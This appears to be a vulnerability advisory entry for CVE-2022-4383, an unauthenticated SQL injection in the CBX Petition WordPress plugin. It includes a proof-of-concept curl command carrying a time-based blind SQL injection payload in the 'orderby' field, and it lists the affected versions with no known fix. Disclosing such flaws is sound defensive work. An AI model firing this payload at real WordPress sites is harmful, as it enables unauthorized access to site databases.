CBX Petition for WordPress <= 1.0.3 – Unauthenticated SQLi | CVE 2022-4383 | Plugin Vulnerabilities

Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

Proof of Concept

1. Create and publish a new petition.

2. Invoke the following curl command, with the nonce in place, to induce a 5-second sleep:

curl -i 'http://127.0.0.1:7777/wp-admin/admin-ajax.php?action=cbxpetition_load_more_signs&security=<NONCE HERE>' \
    --data 'petition_id=2133&perpage=30&order=xxxxxxxxx&page=2&orderby=id AND (SELECT 4657 FROM (SELECT(SLEEP(5)))kvyf)'

Affects Plugins

No known fix

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

e0fe5a53-8ae2-4b67-ac6e-4a8860e39035

Timeline

Publicly Published

2022-12-27 (about 1 years ago)

Added

2022-12-27 (about 1 years ago)

Last Updated

2022-12-27 (about 1 years ago)

Other

Published

Title

Published

2016-04-06

Title

All In One WP Security And Firewall < 4.0.7 - Multiple SQL Injections

Published

2022-11-07

Title

WP User Merger < 1.5.3 - Admin+ SQLi via ID

Published

2024-02-07

Title

Booking Calendar < 9.9.1 - Unauthenticated SQL Injection

Published

2017-07-21

Title

WordPress Plugin IBPS Online Exam <= 1.0 - Authenticated SQL Injection / Cross-Site Scripting

Published

2020-11-02

Title

AccessPress Social Icons < 1.8.1 - Authenticated SQL Injection